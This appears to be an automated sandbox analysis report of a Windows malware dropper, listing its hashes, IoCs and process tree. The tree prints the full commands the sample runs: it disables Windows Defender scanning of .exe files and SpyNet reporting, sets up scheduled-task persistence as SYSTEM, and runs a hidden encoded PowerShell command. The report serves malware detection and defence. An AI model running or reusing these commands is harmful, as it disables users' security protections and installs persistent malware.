Analysis
-
max time kernel
158s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
20-10-2022 12:37
Static task
static1
Behavioral task
behavioral1
Sample
aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe
Resource
win7-20220812-en
General
-
Target
aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe
-
Size
7.3MB
-
MD5
ff57d53e6d0eea8498d08effa5b54133
-
SHA1
8223400b775e64c1899da40c58d70db0daf5420a
-
SHA256
aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2
-
SHA512
88ad7d73dc0f9a171f690b471f4220866ddaea2449b6560ec45070b57b8ff76d5ba7740405ef16a100e3463d615d7885b3b7a83dd9c192d11fc8d226d082023e
-
SSDEEP
196608:91OrVzZghwbM+heDQ6n7nar7K0yDZ7rdq63+oN/bTf:3OrVS1OynanKdz3xN/bTf
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 62 2848 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 5028 Install.exe 5020 Install.exe 1416 fRQRPOK.exe 364 WebdBLG.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WebdBLG.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 1 IoCs
pid Process 2848 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json WebdBLG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json WebdBLG.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini WebdBLG.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 WebdBLG.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini fRQRPOK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 WebdBLG.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol fRQRPOK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 WebdBLG.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 WebdBLG.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content WebdBLG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WebdBLG.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\CGnJgFCBAzUn\QqJrlPl.dll WebdBLG.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi WebdBLG.exe File created C:\Program Files (x86)\DGkdqERBU\vxbCAyP.xml WebdBLG.exe File created C:\Program Files (x86)\mClEBLvlRMFiC\nZKnxzu.dll WebdBLG.exe File created C:\Program Files (x86)\mClEBLvlRMFiC\HAUpHji.xml WebdBLG.exe File created C:\Program Files (x86)\DGkdqERBU\NBUiuD.dll WebdBLG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WebdBLG.exe File created C:\Program Files (x86)\PFmWviqWHYwU2\QNTBQUqiSuGDr.dll WebdBLG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi WebdBLG.exe File created C:\Program Files (x86)\VyejTHXZDswSKCkodlR\PlwroxB.dll WebdBLG.exe File created C:\Program Files (x86)\VyejTHXZDswSKCkodlR\CdCzGCm.xml WebdBLG.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WebdBLG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja WebdBLG.exe File created C:\Program Files (x86)\PFmWviqWHYwU2\GjIwWMB.xml WebdBLG.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bWfTenrnZRhiBbesVI.job schtasks.exe File created C:\Windows\Tasks\jCymsroQFbYeGMouD.job schtasks.exe File created C:\Windows\Tasks\PPsmXAxsGZAbEXH.job schtasks.exe File created C:\Windows\Tasks\vuBtYGxUFUjHFzcbJ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4236 schtasks.exe 1856 schtasks.exe 4572 schtasks.exe 4180 schtasks.exe 4376 schtasks.exe 3520 schtasks.exe 1700 schtasks.exe 2204 schtasks.exe 1140 schtasks.exe 4184 schtasks.exe 1632 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} WebdBLG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" WebdBLG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" WebdBLG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" WebdBLG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume WebdBLG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" WebdBLG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WebdBLG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" WebdBLG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" WebdBLG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" WebdBLG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer WebdBLG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" WebdBLG.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 2848 powershell.EXE 2848 powershell.EXE 3396 powershell.exe 3396 powershell.exe 3496 powershell.exe 3496 powershell.exe 1832 powershell.EXE 1832 powershell.EXE 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe 364 WebdBLG.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2848 powershell.EXE Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeDebugPrivilege 1832 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4336 wrote to memory of 5028 4336 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 82 PID 4336 wrote to memory of 5028 4336 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 82 PID 4336 wrote to memory of 5028 4336 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 82 PID 5028 wrote to memory of 5020 5028 Install.exe 83 PID 5028 wrote to memory of 5020 5028 Install.exe 83 PID 5028 wrote to memory of 5020 5028 Install.exe 83 PID 5020 wrote to memory of 2084 5020 Install.exe 84 PID 5020 wrote to memory of 2084 5020 Install.exe 84 PID 5020 wrote to memory of 2084 5020 Install.exe 84 PID 5020 wrote to memory of 552 5020 Install.exe 86 PID 5020 wrote to memory of 552 5020 Install.exe 86 PID 5020 wrote to memory of 552 5020 Install.exe 86 PID 2084 wrote to memory of 1320 2084 forfiles.exe 88 PID 2084 wrote to memory of 1320 2084 forfiles.exe 88 PID 2084 wrote to memory of 1320 2084 forfiles.exe 88 PID 552 wrote to memory of 260 552 forfiles.exe 89 PID 552 wrote to memory of 260 552 forfiles.exe 89 PID 552 wrote to memory of 260 552 forfiles.exe 89 PID 1320 wrote to memory of 3852 1320 cmd.exe 90 PID 1320 wrote to memory of 3852 1320 cmd.exe 90 PID 1320 wrote to memory of 3852 1320 cmd.exe 90 PID 260 wrote to memory of 3876 260 cmd.exe 91 PID 260 wrote to memory of 3876 260 cmd.exe 91 PID 260 wrote to memory of 3876 260 cmd.exe 91 PID 1320 wrote to memory of 868 1320 cmd.exe 92 PID 1320 wrote to memory of 868 1320 cmd.exe 92 PID 1320 wrote to memory of 868 1320 cmd.exe 92 PID 260 wrote to memory of 3880 260 cmd.exe 93 PID 260 wrote to memory of 3880 260 cmd.exe 93 PID 260 wrote to memory of 3880 260 cmd.exe 93 PID 5020 wrote to memory of 3520 5020 Install.exe 94 PID 5020 wrote to memory of 3520 5020 Install.exe 94 PID 5020 wrote to memory of 3520 5020 Install.exe 94 PID 5020 wrote to memory of 3688 5020 Install.exe 96 PID 5020 wrote to memory of 3688 5020 Install.exe 96 PID 5020 wrote to memory of 3688 5020 Install.exe 96 PID 2848 wrote to memory of 3776 2848 powershell.EXE 100 PID 2848 wrote to memory of 3776 2848 powershell.EXE 100 PID 5020 wrote to memory of 1632 5020 Install.exe 108 PID 5020 wrote to memory of 1632 5020 Install.exe 108 PID 5020 wrote to memory of 1632 5020 Install.exe 108 PID 5020 wrote to memory of 1700 5020 Install.exe 111 PID 5020 wrote to memory of 1700 5020 Install.exe 111 PID 5020 wrote to memory of 1700 5020 Install.exe 111 PID 1416 wrote to memory of 3396 1416 fRQRPOK.exe 117 PID 1416 wrote to memory of 3396 1416 fRQRPOK.exe 117 PID 1416 wrote to memory of 3396 1416 fRQRPOK.exe 117 PID 3396 wrote to memory of 4044 3396 powershell.exe 119 PID 3396 wrote to memory of 4044 3396 powershell.exe 119 PID 3396 wrote to memory of 4044 3396 powershell.exe 119 PID 4044 wrote to memory of 4236 4044 cmd.exe 120 PID 4044 wrote to memory of 4236 4044 cmd.exe 120 PID 4044 wrote to memory of 4236 4044 cmd.exe 120 PID 3396 wrote to memory of 4584 3396 powershell.exe 121 PID 3396 wrote to memory of 4584 3396 powershell.exe 121 PID 3396 wrote to memory of 4584 3396 powershell.exe 121 PID 3396 wrote to memory of 2388 3396 powershell.exe 122 PID 3396 wrote to memory of 2388 3396 powershell.exe 122 PID 3396 wrote to memory of 2388 3396 powershell.exe 122 PID 3396 wrote to memory of 2260 3396 powershell.exe 123 PID 3396 wrote to memory of 2260 3396 powershell.exe 123 PID 3396 wrote to memory of 2260 3396 powershell.exe 123 PID 3396 wrote to memory of 1096 3396 powershell.exe 124 PID 3396 wrote to memory of 1096 3396 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe"C:\Users\Admin\AppData\Local\Temp\aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Users\Admin\AppData\Local\Temp\7zSFEF6.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\7zS678.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3852
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:868
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:260 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3876
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3880
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRflWaOZq" /SC once /ST 10:47:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRflWaOZq"4⤵PID:3688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRflWaOZq"4⤵PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWfTenrnZRhiBbesVI" /SC once /ST 14:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\fRQRPOK.exe\" 1d /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1700
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3776
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2704
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\fRQRPOK.exeC:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\fRQRPOK.exe 1d /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1416 -
